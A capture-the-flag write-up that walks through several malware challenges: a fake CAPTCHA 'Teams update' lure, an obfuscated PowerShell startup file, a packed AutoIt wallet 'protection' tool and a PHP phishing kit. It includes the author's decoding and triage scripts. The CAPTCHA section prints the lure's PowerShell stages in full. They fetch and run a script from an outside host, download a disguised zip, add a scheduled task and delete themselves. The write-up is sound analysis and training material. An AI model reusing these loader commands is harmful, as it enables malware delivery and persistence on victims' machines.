Verify You Are Human
My computer said I needed to update MS Teams, so that is what I have been trying to do… …but I can’t seem to get past this CAPTCHA!
Spin up the VM and connect with developer tools open. A review of the site in the Inspector window reveals some base64 code. Decoded it to get:
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -Wi HI -nop -c "$UkvqRHtIr=$env:LocalAppData+'\'+(Get-Random -Minimum 5482 -Maximum 86245)+'.PS1';irm 'http://cb8c1afc.proxy.coursestack.com:443/?tic=1'> $UkvqRHtIr;powershell -Wi HI -ep bypass -f $UkvqRHtIr"
Next, I was able to pull the second stage using curl (though I had to upgrade to https and add my session token to the request), which revealed another PowerShell command. This time it seemed to be downloading a zip file.
$JGFDGMKNGD = ([char]46)+([char]112)+([char]121)+([char]99);$HMGDSHGSHSHS = [guid]::NewGuid();$OIEOPTRJGS = $env:LocalAppData;irm 'http://cb8c1afc.proxy.coursestack.com:443/?tic=2' -OutFile $OIEOPTRJGS\$HMGDSHGSHSHS.pdf;Add-Type -AssemblyName System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory("$OIEOPTRJGS\$HMGDSHGSHSHS.pdf", "$OIEOPTRJGS\$HMGDSHGSHSHS");$PIEVSDDGs = Join-Path $OIEOPTRJGS $HMGDSHGSHSHS;$WQRGSGSD = "$HMGDSHGSHSHS";$RSHSRHSRJSJSGSE = "$PIEVSDDGs\pythonw.exe";$RYGSDFSGSH = "$PIEVSDDGs\cpython-3134.pyc";$ENRYERTRYRNTER = New-ScheduledTaskAction -Execute $RSHSRHSRJSJSGSE -Argument "`"$RYGSDFSGSH`"";$TDRBRTRNREN = (Get-Date).AddSeconds(180);$YRBNETMREMY = New-ScheduledTaskTrigger -Once -At $TDRBRTRNREN;$KRYIYRTEMETN = New-ScheduledTaskPrincipal -UserId "$env:USERNAME" -LogonType Interactive -RunLevel Limited;Register-ScheduledTask -TaskName $WQRGSGSD -Action $ENRYERTRYRNTER -Trigger $YRBNETMREMY -Principal $KRYIYRTEMETN -Force;Set-Location $PIEVSDDGs;$WMVCNDYGDHJ = "cpython-3134" + $JGFDGMKNGD; Rename-Item -Path "cpython-3134" -NewName $WMVCNDYGDHJ; iex ('rundll32 shell32.dll,ShellExec_RunDLL "' + $PIEVSDDGs + '\pythonw" "' + $PIEVSDDGs + '\'+ $WMVCNDYGDHJ + '"');Remove-Item $MyInvocation.MyCommand.Path -Force;Set-Clipboard
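As an added triage helper (my own example, not the author's script), the following Python folds the `([char]N)+...` string construction used in the stage-2 command back into the literal it builds and lists the URL fetched and the persistence mechanism. STAGE2_EXCERPT is a shortened excerpt of the command above, trimmed to the statements the helper needs.

```python
import re

# Shortened excerpt of the stage-2 PowerShell shown above (statements trimmed for brevity)
STAGE2_EXCERPT = (
    "$JGFDGMKNGD = ([char]46)+([char]112)+([char]121)+([char]99);"
    "$OIEOPTRJGS = $env:LocalAppData;"
    "irm 'http://cb8c1afc.proxy.coursestack.com:443/?tic=2' -OutFile $OIEOPTRJGS\\$HMGDSHGSHSHS.pdf;"
    "Register-ScheduledTask -TaskName $WQRGSGSD -Action $ENRYERTRYRNTER "
    "-Trigger $YRBNETMREMY -Principal $KRYIYRTEMETN -Force;"
)

# A ([char]N) term, optionally followed by more ([char]N) terms joined with '+'
CHAR_CONCAT = re.compile(r"\(\[char\]\d+\)(?:\+\(\[char\]\d+\))*")


def fold_char_concat(script: str) -> str:
    """Replace each ([char]46)+([char]112)+... chain with the quoted literal it builds."""
    def repl(m):
        codes = re.findall(r"\[char\](\d+)", m.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHAR_CONCAT.sub(repl, script)


def extract_iocs(script: str) -> dict:
    """Triage summary: URLs fetched, single-quoted literals (after folding) and
    whether the script registers a scheduled task for persistence."""
    folded = fold_char_concat(script)
    return {
        "urls": re.findall(r"https?://[^\s'\"]+", folded),
        "literals": re.findall(r"'([^']*)'", folded),
        "scheduled_task": "Register-ScheduledTask" in folded,
    }


if __name__ == "__main__":
    print(fold_char_concat(STAGE2_EXCERPT))
    print(extract_iocs(STAGE2_EXCERPT))
```

Folding the first statement shows the hidden ".pyc" extension that the later Rename-Item step appends to the downloaded cpython-3134 file.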
Another curl, and the zip was retrieved. When unpacked, it contained Python-related files and some DLL files. output.py stood out based on its name alone and contained some base64 data. This decoded to another Python code block that performs some XOR and generates shellcode. I wrote this shellcode to a file and identified it as x86-based. I used this small piece of Python code to view the instructions it would execute if run:
from capstone import *

# Disassemble the extracted shellcode as 32-bit x86 and print each instruction
data = open("shellcode.bin", "rb").read()
md = Cs(CS_ARCH_X86, CS_MODE_32)
for i in md.disasm(data, 0x0):
    print("0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str))

The following CyberChef recipe was used to extract the flag by copy/pasting the 10 hex values:
Regular_expression('User defined','0x[0-f]{8}',true,true,false,false,false,false,'List matches')
Reverse('Line')
From_Hex('Auto')
XOR({'option':'Hex','string':'0xa5a5a5a5'},'Standard',false)
Swap_endianness('Raw',4,true)
flag{d341b8d2c96e9cc96965afbf5675fc26}
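The CyberChef recipe above, rewritten as Python so the stack-string decoding can be scripted against the Capstone listing. This is an added example, not code from the original writeup; encode_stack_string is a constructed stand-in that produces push lines in the same shape as the real shellcode, and the sample flag it uses is made up.

```python
import re

XOR_KEY = 0xA5A5A5A5
# Same idea as the CyberChef regex step: 32-bit immediates as printed by Capstone
HEX_IMM = re.compile(r"0x[0-9a-f]{8}")


def decode_stack_string(disasm: str, key: int = XOR_KEY) -> bytes:
    """Python equivalent of the recipe above.
    Reverse('Line'): the shellcode pushes the last dword first, so reverse the order.
    XOR + Swap_endianness: undo the key and emit each dword little-endian, because the
    disassembler prints each immediate most-significant byte first."""
    imms = HEX_IMM.findall(disasm)
    out = bytearray()
    for imm in reversed(imms):
        out += (int(imm, 16) ^ key).to_bytes(4, "little")
    return bytes(out).rstrip(b"\x00")


def encode_stack_string(s: bytes, key: int = XOR_KEY) -> str:
    """Constructed stand-in for the real shellcode: emit 'push' lines in the
    shape Capstone printed, with each dword XOR-encoded with the key."""
    padded = s + b"\x00" * (-len(s) % 4)
    lines, addr = [], 0
    for i in range(len(padded) - 4, -1, -4):
        dword = int.from_bytes(padded[i:i + 4], "little") ^ key
        lines.append("0x%x:\tpush\t0x%08x" % (addr, dword))
        addr += 5  # push imm32 is a 5-byte instruction
    return "\n".join(lines)


if __name__ == "__main__":
    sample = b"flag{0123456789abcdef0123456789abcdef}"  # constructed, not the real flag
    listing = encode_stack_string(sample)
    print(listing)
    print(decode_stack_string(listing))
```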
Spaghetti
You know, I’ve been thinking… at the end of the day, spaghetti is really just strings of pasta! Anyway, we saw this weird file running on startup. Can you figure out what this is? I’m sure you’ll get more understanding of the questions below as you explore!
I found the flags for this challenge in the following order (Oasis > MainFile > MEMEMAN), which is irrelevant, but the large strings stood out to me first; then I overlooked the second large string blob for MEMEMAN!
MainFileSettings
Found the first flag after being intrigued by the AYGIW.tmp file in the unpacked files provided. This started with the hex for a Windows binary (4D5A). Ran the following command to convert the file's hex string to bytes, run strings, then grep for the flag:
cat AYGIW.tmp | tr -dC '[:xdigit:]' | xxd -r -p | strings | grep "flag{"
flag{39544d3b5374ebf7d39b8c260fc4afd8}
My Fourth Oasis
Opened the spaghetti file; the obvious standout was $MyOasis4, found by searching for Oasis in the text (the subtitle was more a hint than anything).
String replace in CyberChef, followed by conversion of Binary data:
Find_/_Replace({'option':'Regex','string':'~'},'0',true,false,true,false)
Find_/_Replace({'option':'Regex','string':'%'},'1',true,false,true,false)
From_Binary('None',8)
The decoded command contains additional HTML encoding, which can be decoded in CyberChef using From HTML Entity to reveal the flag:
flag{b313794dcef335da6206d54af81b6203}
MEMEMAN
The function right below the Oasis one, $Tdefo, is decoded using the same recipe as above, with the flag clear in the output:
flag{60814731f508781b9a5f8636c817af9d}
SANDY
My friend Sandy is really into cryptocurrencies! She’s been trying to get me into it too, so she showed me a lot of Chrome extensions I could add to manage my wallets. Once I got everything set up, she gave me this cool program! She says it adds better protection so my wallets can’t get messed with by hackers. Sandy wouldn’t lie to me, would she…? Sandy is the best!
Ran the file command to see that the file is UPX packed. Unpacked it, ran strings, and spotted AutoIt references. Used this tool to extract the AutoIt script.
A large number of base64 chunks sit around line 521. Copied them to a file and wrote a Python script to parse the chunks into one blob and decode it:
import re, base64

# extracted.txt holds the copied $base64chunks block from the AutoIt script
with open('extracted.txt', 'r') as f:
    data = f.read()

# Extract all quoted strings from the $base64chunks block and join them into one blob
chunks = re.findall(r'"([^"]+)"', data)
joined = "".join(chunks)
decoded = base64.b64decode(joined)

# The decoded bytes are UTF-16LE text; write them out as a text file
with open('decoded.txt', 'w') as f:
    f.write(decoded.decode('utf-16le'))
print('Decoded as UTF-16LE text and saved to decoded.txt')
Review of the decoded output showed multiple base64-encoded blobs, so I wrote another script to decode them all and write the output to log files (11 unique entries). Ran a grep for "flag" to retrieve the flag from one of the outputs:
flag{27768419fd176648b335aa92b8d2dab2}
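The second script is not shown above, so here is an added example of the same step (my own code, not the author's): it pulls every base64 run out of the decoded text, keeps only the unique decoded blobs, writes each to its own log file and searches them for a flag both raw and as UTF-16LE. SAMPLE is a constructed input with a made-up flag; the 40-character minimum run length and the flag regex are my assumptions.

```python
import base64
import binascii
import hashlib
import re

# Runs of base64 alphabet of at least 40 chars; shorter runs are mostly identifiers
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
FLAG_RE = re.compile(rb"flag\{[0-9a-f]{32}\}")


def extract_b64_blobs(text: str):
    """Decode every valid base64 run in text, deduplicated by SHA-256 of the
    decoded bytes. Returns a list of (sha256_hex, decoded_bytes) in first-seen order."""
    blobs, seen = [], set()
    for m in B64_RUN.finditer(text):
        try:
            data = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # looked like base64 but was not (bad length or padding)
        digest = hashlib.sha256(data).hexdigest()
        if digest not in seen:
            seen.add(digest)
            blobs.append((digest, data))
    return blobs


def find_flags(blobs) -> list:
    """Search each blob both raw and as UTF-16LE text (the encoding the first stage used)."""
    found = set()
    for _, data in blobs:
        as_text = data.decode("utf-16le", errors="ignore").encode("utf-8", errors="ignore")
        for view in (data, as_text):
            found.update(f.decode() for f in FLAG_RE.findall(view))
    return sorted(found)


def write_blobs(blobs, prefix: str = "blob") -> None:
    """Write each unique blob to its own log file for manual review."""
    for i, (digest, data) in enumerate(blobs, 1):
        with open(f"{prefix}_{i:02d}_{digest[:8]}.log", "wb") as f:
            f.write(data)


# Constructed sample: one blob repeated twice plus a UTF-16LE blob carrying a made-up flag
_FILLER = base64.b64encode(b"constructed filler payload, nothing to see in this one").decode()
_FLAG16 = base64.b64encode("flag{00000000000000000000000000000000}".encode("utf-16le")).decode()
SAMPLE = f"$a = '{_FILLER}'\n$b = '{_FILLER}'\n$c = '{_FLAG16}'\n"

if __name__ == "__main__":
    blobs = extract_b64_blobs(SAMPLE)
    print(len(blobs), "unique blobs;", find_flags(blobs))
```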
For Greatness
Oh great, another phishing kit. This has some functionality to even send stolen data over email! Can you track down the email address they send things to?
Let AI do the heavy lifting for this one since I was super busy with work! ChatGPT managed to recover the flag with a few of the correct prompts, albeit the flag was in reverse. A quick CyberChef switcharoo to get the correct format and bosh:
flag{f791310cef49f4d25d0778107033117f}
To understand the challenge better when I had time, I wrote a Python script to decode the mixed hex/octal encoding in the PHP file. Establishing what the smaller functions achieved made it easier to expand the script to decode the large blob, get the second stage and extract some base64.
I updated each iteration of the script until the flag was recovered. Script available here
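The author's script is linked rather than shown, so the following is an added example (my own, not the linked script) of the decoding step it describes: PHP double-quoted strings may mix \xHH hex escapes, \NNN octal escapes and the usual simple escapes, and phishing kits use that to hide function names. The PHP line in the main block is constructed for illustration.

```python
import re

# \xHH (1-2 hex digits), \NNN (1-3 octal digits) or a simple escape, as PHP parses them
PHP_ESC = re.compile(r"\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtv\\\"$])")
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "\\": "\\", '"': '"', "$": "$"}


def php_unescape(s: str) -> str:
    """Decode the escape sequences of one PHP double-quoted string body."""
    def repl(m):
        esc = m.group(1)
        if esc[0] == "x":
            return chr(int(esc[1:], 16))
        if esc[0] in "01234567":
            return chr(int(esc, 8) & 0xFF)  # PHP silently truncates \400 to a byte
        return _SIMPLE[esc]
    return PHP_ESC.sub(repl, s)


def unescape_all_strings(php_src: str) -> str:
    """Rewrite every double-quoted literal in php_src with its decoded value so the
    obfuscated names read as plain text. The result is for reading, not valid PHP."""
    def repl(m):
        return '"' + php_unescape(m.group(1)) + '"'
    return re.sub(r'"((?:[^"\\]|\\.)*)"', repl, php_src)


if __name__ == "__main__":
    # Constructed line in the style of the kit: hex and octal escapes mixed in one name
    line = r'$f = "\x62\141\163\x65\066\x34" . "\x5f\144\x65\143\157\144\x65";'
    print(unescape_all_strings(line))
```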